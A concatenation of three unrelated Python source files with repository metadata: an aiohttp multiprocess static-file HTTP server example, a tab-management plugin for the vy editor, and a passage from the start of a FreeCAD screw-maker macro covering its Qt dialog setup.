#!/usr/bin/env python3
"""Simple multiprocess HTTP server written using an event loop."""
import argparse
import os
import socket
import signal
import time
import asyncio
import aiohttp
import aiohttp.server
from aiohttp import websocket
ARGS = argparse.ArgumentParser(description="Run simple HTTP server.")
ARGS.add_argument(
'--host', action="store", dest='host',
default='127.0.0.1', help='Host name')
ARGS.add_argument(
'--port', action="store", dest='port',
default=8080, type=int, help='Port number')
ARGS.add_argument(
'--workers', action="store", dest='workers',
default=2, type=int, help='Number of workers.')
class HttpRequestHandler(aiohttp.server.ServerHttpProtocol):
@asyncio.coroutine
def handle_request(self, message, payload):
print('{}: method = {!r}; path = {!r}; version = {!r}'.format(
os.getpid(), message.method, message.path, message.version))
path = message.path
if (not (path.isprintable() and path.startswith('/')) or '/.' in path):
path = None
else:
path = '.' + path
if not os.path.exists(path):
path = None
else:
isdir = os.path.isdir(path)
if not path:
raise aiohttp.HttpProcessingError(code=404)
if isdir and not path.endswith('/'):
path = path + '/'
raise aiohttp.HttpProcessingError(
code=302, headers=(('URI', path), ('Location', path)))
response = aiohttp.Response(
self.writer, 200, http_version=message.version)
response.add_header('Transfer-Encoding', 'chunked')
# content encoding
accept_encoding = message.headers.get('accept-encoding', '').lower()
if 'deflate' in accept_encoding:
response.add_header('Content-Encoding', 'deflate')
response.add_compression_filter('deflate')
elif 'gzip' in accept_encoding:
response.add_header('Content-Encoding', 'gzip')
response.add_compression_filter('gzip')
response.add_chunking_filter(1025)
if isdir:
response.add_header('Content-type', 'text/html')
response.send_headers()
response.write(b'<ul>\r\n')
for name in sorted(os.listdir(path)):
if name.isprintable() and not name.startswith('.'):
try:
bname = name.encode('ascii')
except UnicodeError:
pass
else:
if os.path.isdir(os.path.join(path, name)):
response.write(b'<li><a href="' + bname +
b'/">' + bname + b'/</a></li>\r\n')
else:
response.write(b'<li><a href="' + bname +
b'">' + bname + b'</a></li>\r\n')
response.write(b'</ul>')
else:
response.add_header('Content-type', 'text/plain')
response.send_headers()
try:
with open(path, 'rb') as fp:
chunk = fp.read(8192)
while chunk:
response.write(chunk)
chunk = fp.read(8192)
except OSError:
response.write(b'Cannot open')
yield from response.write_eof()
if response.keep_alive():
self.keep_alive(True)
class ChildProcess:
def __init__(self, up_read, down_write, args, sock):
self.up_read = up_read
self.down_write = down_write
self.args = args
self.sock = sock
def start(self):
# start server
self.loop = loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
def stop():
self.loop.stop()
os._exit(0)
loop.add_signal_handler(signal.SIGINT, stop)
f = loop.create_server(
lambda: HttpRequestHandler(debug=True, keep_alive=75),
sock=self.sock)
srv = loop.run_until_complete(f)
x = srv.sockets[0]
print('Starting srv worker process {} on {}'.format(
os.getpid(), x.getsockname()))
# heartbeat
asyncio.async(self.heartbeat())
asyncio.get_event_loop().run_forever()
os._exit(0)
@asyncio.coroutine
def heartbeat(self):
# setup pipes
read_transport, read_proto = yield from self.loop.connect_read_pipe(
aiohttp.StreamProtocol, os.fdopen(self.up_read, 'rb'))
write_transport, _ = yield from self.loop.connect_write_pipe(
aiohttp.StreamProtocol, os.fdopen(self.down_write, 'wb'))
reader = read_proto.reader.set_parser(websocket.WebSocketParser)
writer = websocket.WebSocketWriter(write_transport)
while True:
try:
msg = yield from reader.read()
except:
print('Supervisor is dead, {} stopping...'.format(os.getpid()))
self.loop.stop()
break
if msg.tp == websocket.MSG_PING:
writer.pong()
elif msg.tp == websocket.MSG_CLOSE:
break
read_transport.close()
write_transport.close()
class Worker:
_started = False
def __init__(self, loop, args, sock):
self.loop = loop
self.args = args
self.sock = sock
self.start()
def start(self):
assert not self._started
self._started = True
up_read, up_write = os.pipe()
down_read, down_write = os.pipe()
args, sock = self.args, self.sock
pid = os.fork()
if pid:
# parent
os.close(up_read)
os.close(down_write)
asyncio.async(self.connect(pid, up_write, down_read))
else:
# child
os.close(up_write)
os.close(down_read)
# cleanup after fork
asyncio.set_event_loop(None)
# setup process
process = ChildProcess(up_read, down_write, args, sock)
process.start()
@asyncio.coroutine
def heartbeat(self, writer):
while True:
yield from asyncio.sleep(15)
if (time.monotonic() - self.ping) < 30:
writer.ping()
else:
print('Restart unresponsive worker process: {}'.format(
self.pid))
self.kill()
self.start()
return
@asyncio.coroutine
def chat(self, reader):
while True:
try:
msg = yield from reader.read()
except:
print('Restart unresponsive worker process: {}'.format(
self.pid))
self.kill()
self.start()
return
if msg.tp == websocket.MSG_PONG:
self.ping = time.monotonic()
@asyncio.coroutine
def connect(self, pid, up_write, down_read):
# setup pipes
read_transport, proto = yield from self.loop.connect_read_pipe(
aiohttp.StreamProtocol, os.fdopen(down_read, 'rb'))
write_transport, _ = yield from self.loop.connect_write_pipe(
aiohttp.StreamProtocol, os.fdopen(up_write, 'wb'))
# websocket protocol
reader = proto.reader.set_parser(websocket.WebSocketParser)
writer = websocket.WebSocketWriter(write_transport)
# store info
self.pid = pid
self.ping = time.monotonic()
self.rtransport = read_transport
self.wtransport = write_transport
self.chat_task = asyncio.Task(self.chat(reader))
self.heartbeat_task = asyncio.Task(self.heartbeat(writer))
def kill(self):
self._started = False
self.chat_task.cancel()
self.heartbeat_task.cancel()
self.rtransport.close()
self.wtransport.close()
os.kill(self.pid, signal.SIGTERM)
class Supervisor:
def __init__(self, args):
self.loop = asyncio.get_event_loop()
self.args = args
self.workers = []
def start(self):
# bind socket
sock = self.sock = socket.socket()
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.bind((self.args.host, self.args.port))
sock.listen(1024)
sock.setblocking(False)
# start processes
for idx in range(self.args.workers):
self.workers.append(Worker(self.loop, self.args, sock))
self.loop.add_signal_handler(signal.SIGINT, lambda: self.loop.stop())
self.loop.run_forever()
def main():
if getattr(os, "fork", None) is None:
print("os.fork isn't supported by your OS")
return
args = ARGS.parse_args()
if ':' in args.host:
args.host, port = args.host.split(':', 1)
args.port = int(port)
supervisor = Supervisor(args)
supervisor.start()
if __name__ == '__main__':
main()
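# Illustrative invocation (host, port and worker count are hypothetical):
#   python mpsrv.py --host 0.0.0.0 --port 8080 --workers 4
# The supervisor binds the listening socket, forks the workers, and restarts any
# worker whose heartbeat has been silent for more than 30 seconds.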
| vaskalas/aiohttp | examples/mpsrv.py | Python | apache-2.0 | 9,115 |
"""
Overview
========
Tabs are a great feature when manipulating several files. This plugin implements Key-Commands to create,
open files, change the focus between opened tabs.
Key-Commands
============
Namespace: tabs
Mode: Global
Event: <Alt-comma>
Description: It pops a file selection window to load the contents of a file in a new tab.
Mode: Global
Event: <Alt-period>
Description: It creates a new blank tab.
Mode: Global
Event: <Alt-x>
Description: It removes the focused tab.
Mode: Global
Event: <Alt-o>
Description: It changes the focus left from a tab.
Mode: Global
Event: <Alt-p>
Description: It changes the focus right from a tab.
"""
from vyapp.app import root
from tkinter.messagebox import *
from tkinter.filedialog import askopenfilename, asksaveasfilename
from vyapp.areavi import AreaVi
def load_tab():
"""
It pops a askopenfilename window to drop
the contents of a file into another tab's text area.
"""
filename = askopenfilename()
# If i don't check it ends up cleaning up
# the text area when one presses cancel.
if not filename:
return 'break'
try:
root.note.load([ [filename] ])
except Exception:
root.status.set_msg('It failed to load.')
else:
root.status.set_msg('File loaded.')
return 'break'
def create_tab():
root.note.create('none')
return 'break'
def remove_tab():
"""
It removes the selected tab.
"""
if len(root.note.tabs()) <= 1: return
name = root.note.select()
wid = root.note.nametowidget(name)
wid.destroy()
root.note.select(0)
root.note.set_area_focus()
# We don't need to call forget after destroy.
    # It seems that note's forget method doesn't destroy the widget
    # at all, so the <Destroy> event isn't propagated.
# root.note.forget(wid)
return 'break'
def select_left():
"""
"""
root.note.select(root.note.index(root.note.select()) - 1)
root.note.set_area_focus()
return 'break'
def select_right():
"""
"""
root.note.select(root.note.index(root.note.select()) + 1)
root.note.set_area_focus()
return 'break'
def install(area):
area.install('tabs', (-1, '<Alt-comma>', lambda event: load_tab()),
(-1, '<Alt-period>', lambda event: create_tab()),
(-1, '<Alt-x>', lambda event: remove_tab()),
(-1, '<Alt-o>', lambda event: select_left()),
(-1, '<Alt-p>', lambda event: select_right()))
| iogf/vy | vyapp/plugins/tabs.py | Python | mit | 2,532 |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# screw_maker2_0.py
#
"""
Macro to generate screws with FreeCAD.
Version 1.4 from 1st of September 2013
Version 1.5 from 23rd of December 2013
  Corrected: hex-heads above M12 were not generated.
Version 1.6 from 15th of March 2014
Added PySide support
Version 1.7 from April 2014
  fixed bool type error (int is no longer accepted on Linux)
fixed starting point of real thread at some screw types.
Version 1.8 from July 2014
first approach for a faster real thread
Version 1.9 / 2.0 July 2015
new calculation of starting point of thread
shell-based approach for screw generation
added:
ISO 14582 Hexalobular socket countersunk head screws, high head
ISO 14584 Hexalobular socket raised countersunk head screws
ISO 7380-2 Hexagon socket button head screws with collar
DIN 967 Cross recessed pan head screws with collar
ISO 4032 Hexagon nuts, Style 1
ISO 4033 Hexagon nuts, Style 2
ISO 4035 Hexagon thin nuts, chamfered
EN 1661 Hexagon nuts with flange
ISO 7094 definitions Plain washers - Extra large series
ISO 7092 definitions Plain washers - Small series
ISO 7093-1 Plain washer - Large series
Screw-tap to drill inner threads in parts with user defined length
ScrewMaker can now also be used as a python module.
The following shows how to generate a screw from a python script:
import screw_maker2_0
threadDef = 'M3.5'
o = screw_maker2_0.Screw()
t = screw_maker2_0.Screw.setThreadType(o,'real')
# Creates a Document-Object with label describing the screw
d = screw_maker2_0.Screw.createScrew(o, 'ISO1207', threadDef, '20', 'real')
# creates a shape in memory
t = screw_maker2_0.Screw.setThreadType(o,'real')
  s = screw_maker2_0.Screw.makeIso7046(o, 'ISO14582', threadDef, 40.0)
Part.show(s)
to do: check ISO7380 usage of rs and rt; actually only rs is used
       check chamfer angle on hexagon heads and nuts
***************************************************************************
* Copyright (c) 2013, 2014, 2015 *
* Ulrich Brammer <ulrich1a[at]users.sourceforge.net> *
* *
* This file is a supplement to the FreeCAD CAx development system. *
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU Lesser General Public License (LGPL) *
* as published by the Free Software Foundation; either version 2 of *
* the License, or (at your option) any later version. *
* for detail see the LICENCE text file. *
* *
* This software is distributed in the hope that it will be useful, *
* but WITHOUT ANY WARRANTY; without even the implied warranty of *
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the *
* GNU Library General Public License for more details. *
* *
* You should have received a copy of the GNU Library General Public *
* License along with this macro; if not, write to the Free Software *
* Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 *
* USA *
* *
***************************************************************************
"""
__author__ = "Ulrich Brammer <ulrich1a@users.sourceforge.net>"
import FreeCAD, FreeCADGui, Part, math, csv, os
from FreeCAD import Base
import DraftVecUtils
try:
from PySide import QtCore, QtGui
#FreeCAD.Console.PrintMessage("PySide is used" + "\n")
except:
#FreeCAD.Console.PrintMessage("PyQt4 is needed" + "\n")
from PyQt4 import QtCore, QtGui
try:
_encoding = QtGui.QApplication.UnicodeUTF8
def _translate(context, text, disambig):
return QtGui.QApplication.translate(context, text, disambig, _encoding)
except AttributeError:
def _translate(context, text, disambig):
return QtGui.QApplication.translate(context, text, disambig)
DEBUG = False # set to True to show debug messages; does not work, still todo.
# import fastener data
__dir__ = os.path.dirname(__file__)
fsdatapath = os.path.join(__dir__, 'FsData')
# function to open a csv file and convert it to a dictionary
def csv2dict(filename, fieldsnamed=True):
data = open(filename, 'r')
reader = csv.reader(data, skipinitialspace=True, dialect='unix', quoting=csv.QUOTE_NONNUMERIC)
dictvar = {}
if fieldsnamed:
# skip the first line
next(reader)
for line_list in reader:
thekey = str(line_list[0])
datavalues = line_list[1:]
thevalue = []
for item in datavalues:
thevalue.append(item)
thevalue = tuple(thevalue)
dictvar.update({thekey: thevalue})
return dictvar
FsData = {}
filelist = os.listdir(fsdatapath)
for item in filelist:
if item[-4:] == '.csv':
itempath = os.path.join(fsdatapath, item)
itemdict = csv2dict(itempath, fieldsnamed=True)
FsData.update({item[0:-4]: itemdict})
try:
_fromUtf8 = QtCore.QString.fromUtf8
except AttributeError:
_fromUtf8 = lambda s: s
class Ui_ScrewMaker(object):
def setupUi(self, ScrewMaker):
FCUi = FreeCADGui.UiLoader()
ScrewMaker.setObjectName(_fromUtf8("ScrewMaker"))
ScrewMaker.resize(450, 362)
ScrewMaker.setLocale(QtCore.QLocale(QtCore.QLocale.English, QtCore.QLocale.UnitedKingdom))
self.layoutWidget = QtGui.QWidget(ScrewMaker)
self.layoutWidget.setGeometry(QtCore.QRect(348, 35, 102, 161))
self.layoutWidget.setObjectName(_fromUtf8("layoutWidget"))
self.verticalLayout_2 = QtGui.QVBoxLayout(self.layoutWidget)
# self.verticalLayout_2.setMargin(0)
self.verticalLayout_2.setObjectName(_fromUtf8("verticalLayout_2"))
self.ScrewTypeLabel = QtGui.QLabel(self.layoutWidget)
self.ScrewTypeLabel.setObjectName(_fromUtf8("ScrewTypeLabel"))
self.verticalLayout_2.addWidget(self.ScrewTypeLabel)
self.NomDiaLabel = QtGui.QLabel(self.layoutWidget)
self.NomDiaLabel.setObjectName(_fromUtf8("NomDiaLabel"))
self.verticalLayout_2.addWidget(self.NomDiaLabel)
self.NomLenLabel = QtGui.QLabel(self.layoutWidget)
self.NomLenLabel.setObjectName(_fromUtf8("NomLenLabel"))
self.verticalLayout_2.addWidget(self.NomLenLabel)
self.UserLenLabel = QtGui.QLabel(self.layoutWidget)
self.UserLenLabel.setObjectName(_fromUtf8("UserLenLabel"))
self.verticalLayout_2.addWidget(self.UserLenLabel)
self.layoutWidget1 = QtGui.QWidget(ScrewMaker)
self.layoutWidget1.setGeometry(QtCore.QRect(3, 35, 350, 166))
# self.layoutWidget1.setGeometry(QtCore.QRect(10, 5, 315, 200))
self.layoutWidget1.setObjectName(_fromUtf8("layoutWidget1"))
self.verticalLayout = QtGui.QVBoxLayout(self.layoutWidget1)
# self.verticalLayout.setMargin(0)
self.verticalLayout.setObjectName(_fromUtf8("verticalLayout"))
self.ScrewType = QtGui.QComboBox(self.layoutWidget1)
self.ScrewType.setObjectName(_fromUtf8("ScrewType"))
for i in range(57):
self.ScrewType.addItem(_fromUtf8("")) # 0
self.verticalLayout.addWidget(self.ScrewType)
self.NominalDiameter = QtGui.QComboBox(self.layoutWidget1)
self.NominalDiameter.setObjectName(_fromUtf8("NominalDiameter"))
for i in range(28):
self.NominalDiameter.addItem(_fromUtf8("")) # 0
self.verticalLayout.addWidget(self.NominalDiameter)
self.NominalLength = QtGui.QComboBox(self.layoutWidget1)
self.NominalLength.setObjectName(_fromUtf8("NominalLength"))
for i in range(48):
self.NominalLength.addItem(_fromUtf8("")) # 0
self.verticalLayout.addWidget(self.NominalLength)
# self.UserLen = QtGui.QComboBox(self.layoutWidget1)
self.UserLen = FCUi.createWidget("Gui::InputField")
self.UserLen.setObjectName(_fromUtf8("UserLen"))
# self.UserLen.addItem(_fromUtf8(""))
self.UserLen.setProperty("text", "0 mm")
self.verticalLayout.addWidget(self.UserLen)
# self.CommentLabel = QtGui.QLabel(self.layoutWidget)
self.CommentLabel = QtGui.QLabel(ScrewMaker)
self.CommentLabel.setObjectName(_fromUtf8("CommentLabel"))
self.CommentLabel.setGeometry(QtCore.QRect(10, 184, 411, 21))
# self.verticalLayout.addWidget(self.CommentLabel)
self.layoutWidget2 = QtGui.QWidget(ScrewMaker)
# self.layoutWidget2.setGeometry(QtCore.QRect(10, 200, 321, 83))
self.layoutWidget2.setGeometry(QtCore.QRect(3, 200, 321, 120))
self.layoutWidget2.setObjectName(_fromUtf8("layoutWidget2"))
self.verticalLayout_3 = QtGui.QVBoxLayout(self.layoutWidget2)
# self.verticalLayout_3.setMargin(0)
self.verticalLayout_3.setObjectName(_fromUtf8("verticalLayout_3"))
self.SimpleScrew = QtGui.QRadioButton(self.layoutWidget2)
self.SimpleScrew.setChecked(True)
self.SimpleScrew.setObjectName(_fromUtf8("SimpleScrew"))
self.verticalLayout_3.addWidget(self.SimpleScrew)
self.SymbolThread = QtGui.QRadioButton(self.layoutWidget2)
self.SymbolThread.setObjectName(_fromUtf8("SymbolThread"))
self.verticalLayout_3.addWidget(self.SymbolThread)
self.RealThread = QtGui.QRadioButton(self.layoutWidget2)
self.RealThread.setObjectName(_fromUtf8("RealThread"))
self.verticalLayout_3.addWidget(self.RealThread)
self.MessageLabel = QtGui.QLabel(ScrewMaker)
self.MessageLabel.setGeometry(QtCore.QRect(10, 10, 411, 21))
self.MessageLabel.setProperty("Empty_text", _fromUtf8(""))
self.MessageLabel.setObjectName(_fromUtf8("MessageLabel"))
self.CreateButton = QtGui.QToolButton(ScrewMaker)
self.CreateButton.setGeometry(QtCore.QRect(180, 320, 111, 26))
self.CreateButton.setObjectName(_fromUtf8("CreateButton"))
self.ScrewAvailable = True
self.simpThread = self.SimpleScrew.isChecked()
self.symThread = self.SymbolThread.isChecked()
self.rThread = self.RealThread.isChecked()
self.theScrew = Screw()
self.retranslateUi(ScrewMaker)
self.NominalDiameter.setCurrentIndex(5)
self.NominalLength.setCurrentIndex(9)
QtCore.QObject.connect(self.ScrewType, QtCore.SIGNAL(_fromUtf8("currentIndexChanged(int)")), self.guiCheck_Data)
QtCore.QObject.connect(self.CreateButton, QtCore.SIGNAL(_fromUtf8("pressed()")), self.guiCreateScrew)
QtCore.QObject.connect(self.NominalDiameter, QtCore.SIGNAL(_fromUtf8("currentIndexChanged(int)")), self.guiCheck_Data)
QtCore.QObject.connect(self.NominalLength, QtCore.SIGNAL(_fromUtf8("currentIndexChanged(int)")), self.guiCheck_Data)
QtCore.QMetaObject.connectSlotsByName(ScrewMaker)
def retranslateUi(self, ScrewMaker):
ScrewMaker.setWindowTitle(_translate("ScrewMaker", "Screw-Maker 2.0", None))
self.ScrewTypeLabel.setText(_translate("ScrewMaker", "Type of Screw", None))
self.NomDiaLabel.setText(_translate("ScrewMaker", "Nominal\nDiameter", None))
self.NomLenLabel.setText(_translate("ScrewMaker", "Nominal\nLength", None))
self.UserLenLabel.setText(_translate("ScrewMaker", "User length \nfor screw-tap", None))
self.CommentLabel.setText(_translate("ScrewMaker", "Values in brackets are not recommended!", None))
self.ScrewType.setItemText(0, _translate("ScrewMaker", "ISO4017: Hexagon head screws", None))
self.ScrewType.setItemText(1, _translate("ScrewMaker", "ISO4014: Hexagon head bolts", None))
self.ScrewType.setItemText(2, _translate("ScrewMaker", "EN1662: Hexagon bolts with flange, small\n series",None))
self.ScrewType.setItemText(3, _translate("ScrewMaker", "EN1665: Hexagon bolts with flange, heavy\n series",None))
self.ScrewType.setItemText(4, _translate("ScrewMaker", "ISO4762: Hexagon socket head cap screws", None))
self.ScrewType.setItemText(5, _translate("ScrewMaker", "ISO7380-1: Hexagon socket button head\n screws", None))
self.ScrewType.setItemText(6, _translate("ScrewMaker", "ISO7380-2: Hexagon socket button head\n screws with collar", None))
self.ScrewType.setItemText(7, _translate("ScrewMaker", "DIN967: Cross recessed pan head screws\n with collar", None))
self.ScrewType.setItemText(8, _translate("ScrewMaker", "ISO10642: Hexagon socket countersunk \n head screws", None))
self.ScrewType.setItemText(9, _translate("ScrewMaker", "ISO2009: Slotted countersunk flat head\n screws", None))
self.ScrewType.setItemText(10, _translate("ScrewMaker", "ISO2010: Slotted raised countersunk head\n screws", None))
self.ScrewType.setItemText(11, _translate("ScrewMaker", "ISO1207: Slotted cheese head screws", None))
self.ScrewType.setItemText(12, _translate("ScrewMaker", "ISO1580: Slotted pan head screws", None))
self.ScrewType.setItemText(13, _translate("ScrewMaker", "ISO7045: Pan head screws, type H cross recess", None))
self.ScrewType.setItemText(14, _translate("ScrewMaker", "ISO7046: Countersunk flat head screws\n H cross recess", None))
self.ScrewType.setItemText(15, _translate("ScrewMaker", "ISO7047: Raised countersunk head screws\n H cross recess", None))
self.ScrewType.setItemText(16, _translate("ScrewMaker", "ISO7048: Cheese head screws type H cross recess", None))
self.ScrewType.setItemText(17, _translate("ScrewMaker", "ISO14579: Hexalobular socket head cap screws", None))
self.ScrewType.setItemText(18, _translate("ScrewMaker", "ISO14580: Hexalobular socket cheese head\n screws", None))
self.ScrewType.setItemText(19, _translate("ScrewMaker", "ISO14583: Hexalobular socket pan head screws", None))
self.ScrewType.setItemText(20, _translate("ScrewMaker", "ISO14582: Hexalobular socket countersunk\n head screws, high head", None))
self.ScrewType.setItemText(21, _translate("ScrewMaker", "ISO14584: Hexalobular socket raised\n countersunk head screws", None))
self.ScrewType.setItemText(22, _translate("ScrewMaker", "ISO7089: Plain washers - Normal series", None))
self.ScrewType.setItemText(23, _translate("ScrewMaker", "ISO7090: Plain washers, chamfered - Normal series", None))
self.ScrewType.setItemText(24, _translate("ScrewMaker", "ISO7092: Plain washers - Small series", None))
self.ScrewType.setItemText(25, _translate("ScrewMaker", "ISO7093-1: Plain washer - Large series", None))
self.ScrewType.setItemText(26, _translate("ScrewMaker", "ISO7094: Plain washers - Extra large series", None))
self.ScrewType.setItemText(27, _translate("ScrewMaker", "ISO4032: Hexagon nuts, Style 1", None))
self.ScrewType.setItemText(28, _translate("ScrewMaker", "ISO4033: Hexagon nuts, Style 2", None))
self.ScrewType.setItemText(29, _translate("ScrewMaker", "ISO4035: Hexagon thin nuts, chamfered", None))
self.ScrewType.setItemText(30, _translate("ScrewMaker", "EN1661: Hexagon nuts with flange", None))
self.ScrewType.setItemText(31, _translate("ScrewMaker", "ScrewTap: ISO Screw-Tap", None))
self.ScrewType.setItemText(32, _translate("ScrewMaker", "ScrewDie: ISO Screw-Die", None))
self.ScrewType.setItemText(33, _translate("ScrewMaker", "ThreadedRod: DIN 975 Threaded Rod", None))
self.ScrewType.setItemText(34, _translate("ScrewMaker", "DIN7984: Hexagon socket head cap screws with low head", None))
self.ScrewType.setItemText(34, _translate("ScrewMaker", "DIN6912: Hexagon socket head cap screws with low head, with centre", None))
self.ScrewType.setItemText(35, _translate("ScrewMaker", "ISO7379: Hexagon socket head shoulder screws", None))
self.ScrewType.setItemText(36, _translate("ScrewMaker", "ISO4026: Hexagon socket set screws with flat point", None))
self.ScrewType.setItemText(37, _translate("ScrewMaker", "ISO4027: Hexagon socket set screws with cone point", None))
self.ScrewType.setItemText(38, _translate("ScrewMaker", "ISO4028: Hexagon socket set screws with dog point", None))
self.ScrewType.setItemText(39, _translate("ScrewMaker", "ISO4029: Hexagon socket set screws with cup point", None))
self.ScrewType.setItemText(40, _translate("ScrewMaker", "ASMEB18.2.1.6: UNC Hexagon head screws", None))
self.ScrewType.setItemText(41, _translate("ScrewMaker", "ASMEB18.2.1.8: UNC hex head bolts with flange", None))
self.ScrewType.setItemText(42, _translate("ScrewMaker", "ASMEB18.2.2.1A: UNC machine screw nuts", None))
self.ScrewType.setItemText(43, _translate("ScrewMaker", "ASMEB18.2.2.4A: UNC Hexagon nuts", None))
self.ScrewType.setItemText(44, _translate("ScrewMaker", "ASMEB18.2.2.4B: UNC Hexagon thin nuts", None))
self.ScrewType.setItemText(45, _translate("ScrewMaker", "ASMEB18.3.1A: UNC Hexagon socket head cap screws", None))
self.ScrewType.setItemText(46, _translate("ScrewMaker", "ASMEB18.3.3A: UNC Hexagon socket button head screws", None))
self.ScrewType.setItemText(47, _translate("ScrewMaker", "ASMEB18.3.3B: UNC Hexagon socket button head screws with flange", None))
self.ScrewType.setItemText(48, _translate("ScrewMaker", "ASMEB18.3.4: UNC Hexagon socket head shoulder screws", None))
self.ScrewType.setItemText(49, _translate("ScrewMaker", "ASMEB18.3.5A: UNC Hexagon socket set screws with flat point", None))
self.ScrewType.setItemText(50, _translate("ScrewMaker", "ASMEB18.3.5B: UNC Hexagon socket set screws with cone point", None))
self.ScrewType.setItemText(51, _translate("ScrewMaker", "ASMEB18.3.5C: UNC Hexagon socket set screws with dog point", None))
self.ScrewType.setItemText(52, _translate("ScrewMaker", "ASMEB18.3.5D: UNC Hexagon socket set screws with cup point", None))
self.ScrewType.setItemText(53, _translate("ScrewMaker", "ASMEB18.6.3.1A: UNC slotted countersunk flat head screws", None))
self.ScrewType.setItemText(54, _translate("ScrewMaker", "ASMEB18.21.1.12A: UN washers, narrow series", None))
self.ScrewType.setItemText(55, _translate("ScrewMaker", "ASMEB18.21.1.12B: UN washers, regular series", None))
self.ScrewType.setItemText(56, _translate("ScrewMaker", "ASMEB18.21.1.12C: UN washers, wide series", None))
self.NominalDiameter.setItemText(0, _translate("ScrewMaker", "M1.6", None))
self.NominalDiameter.setItemText(1, _translate("ScrewMaker", "M2", None))
self.NominalDiameter.setItemText(2, _translate("ScrewMaker", "M2.5", None))
self.NominalDiameter.setItemText(3, _translate("ScrewMaker", "M3", None))
self.NominalDiameter.setItemText(4, _translate("ScrewMaker", "(M3.5)", None))
self.NominalDiameter.setItemText(5, _translate("ScrewMaker", "M4", None))
self.NominalDiameter.setItemText(6, _translate("ScrewMaker", "M5", None))
self.NominalDiameter.setItemText(7, _translate("ScrewMaker", "M6", None))
self.NominalDiameter.setItemText(8, _translate("ScrewMaker", "M8", None))
self.NominalDiameter.setItemText(9, _translate("ScrewMaker", "M10", None))
self.NominalDiameter.setItemText(10, _translate("ScrewMaker", "M12", None))
self.NominalDiameter.setItemText(11, _translate("ScrewMaker", "(M14)", None))
self.NominalDiameter.setItemText(12, _translate("ScrewMaker", "M16", None))
self.NominalDiameter.setItemText(13, _translate("ScrewMaker", "(M18)", None))
self.NominalDiameter.setItemText(14, _translate("ScrewMaker", "M20", None))
self.NominalDiameter.setItemText(15, _translate("ScrewMaker", "(M22)", None))
self.NominalDiameter.setItemText(16, _translate("ScrewMaker", "M24", None))
self.NominalDiameter.setItemText(17, _translate("ScrewMaker", "(M27)", None))
self.NominalDiameter.setItemText(18, _translate("ScrewMaker", "M30", None))
self.NominalDiameter.setItemText(19, _translate("ScrewMaker", "M36", None))
self.NominalDiameter.setItemText(20, _translate("ScrewMaker", "(M33)", None))
self.NominalDiameter.setItemText(21, _translate("ScrewMaker", "M42", None))
self.NominalDiameter.setItemText(22, _translate("ScrewMaker", "(M45)", None))
self.NominalDiameter.setItemText(23, _translate("ScrewMaker", "M48", None))
self.NominalDiameter.setItemText(24, _translate("ScrewMaker", "(M52)", None))
self.NominalDiameter.setItemText(25, _translate("ScrewMaker", "M54", None))
self.NominalDiameter.setItemText(26, _translate("ScrewMaker", "(M60)", None))
self.NominalDiameter.setItemText(27, _translate("ScrewMaker", "M64", None))
self.NominalLength.setItemText(0, _translate("ScrewMaker", "2", None))
self.NominalLength.setItemText(1, _translate("ScrewMaker", "2.5", None))
self.NominalLength.setItemText(2, _translate("ScrewMaker", "3", None))
self.NominalLength.setItemText(3, _translate("ScrewMaker", "4", None))
self.NominalLength.setItemText(4, _translate("ScrewMaker", "5", None))
self.NominalLength.setItemText(5, _translate("ScrewMaker", "6", None))
self.NominalLength.setItemText(6, _translate("ScrewMaker", "8", None))
self.NominalLength.setItemText(7, _translate("ScrewMaker", "10", None))
self.NominalLength.setItemText(8, _translate("ScrewMaker", "12", None))
self.NominalLength.setItemText(9, _translate("ScrewMaker", "16", None))
self.NominalLength.setItemText(10, _translate("ScrewMaker", "20", None))
self.NominalLength.setItemText(11, _translate("ScrewMaker", "25", None))
self.NominalLength.setItemText(12, _translate("ScrewMaker", "30", None))
self.NominalLength.setItemText(13, _translate("ScrewMaker", "35", None))
self.NominalLength.setItemText(14, _translate("ScrewMaker", "40", None))
self.NominalLength.setItemText(15, _translate("ScrewMaker", "45", None))
self.NominalLength.setItemText(16, _translate("ScrewMaker", "50", None))
self.NominalLength.setItemText(17, _translate("ScrewMaker", "55", None))
self.NominalLength.setItemText(18, _translate("ScrewMaker", "60", None))
self.NominalLength.setItemText(19, _translate("ScrewMaker", "65", None))
self.NominalLength.setItemText(20, _translate("ScrewMaker", "70", None))
self.NominalLength.setItemText(21, _translate("ScrewMaker", "80", None))
self.NominalLength.setItemText(22, _translate("ScrewMaker", "90", None))
self.NominalLength.setItemText(23, _translate("ScrewMaker", "100", None))
self.NominalLength.setItemText(24, _translate("ScrewMaker", "110", None))
self.NominalLength.setItemText(25, _translate("ScrewMaker", "120", None))
self.NominalLength.setItemText(26, _translate("ScrewMaker", "130", None))
self.NominalLength.setItemText(27, _translate("ScrewMaker", "140", None))
self.NominalLength.setItemText(28, _translate("ScrewMaker", "150", None))
self.NominalLength.setItemText(29, _translate("ScrewMaker", "160", None))
self.NominalLength.setItemText(30, _translate("ScrewMaker", "180", None))
self.NominalLength.setItemText(31, _translate("ScrewMaker", "200", None))
self.NominalLength.setItemText(32, _translate("ScrewMaker", "220", None))
self.NominalLength.setItemText(33, _translate("ScrewMaker", "240", None))
self.NominalLength.setItemText(34, _translate("ScrewMaker", "260", None))
self.NominalLength.setItemText(35, _translate("ScrewMaker", "280", None))
self.NominalLength.setItemText(36, _translate("ScrewMaker", "300", None))
self.NominalLength.setItemText(37, _translate("ScrewMaker", "320", None))
self.NominalLength.setItemText(38, _translate("ScrewMaker", "340", None))
self.NominalLength.setItemText(39, _translate("ScrewMaker", "360", None))
self.NominalLength.setItemText(40, _translate("ScrewMaker", "380", None))
self.NominalLength.setItemText(41, _translate("ScrewMaker", "400", None))
self.NominalLength.setItemText(42, _translate("ScrewMaker", "420", None))
self.NominalLength.setItemText(43, _translate("ScrewMaker", "440", None))
self.NominalLength.setItemText(44, _translate("ScrewMaker", "460", None))
self.NominalLength.setItemText(45, _translate("ScrewMaker", "480", None))
self.NominalLength.setItemText(46, _translate("ScrewMaker", "500", None))
self.NominalLength.setItemText(47, _translate("ScrewMaker", "User", None))
# self.UserLen.setItemText(0, _translate("ScrewMaker", "regular pitch", None))
self.SimpleScrew.setText(_translate("ScrewMaker", "Simple Screw (no thread at all!)", None))
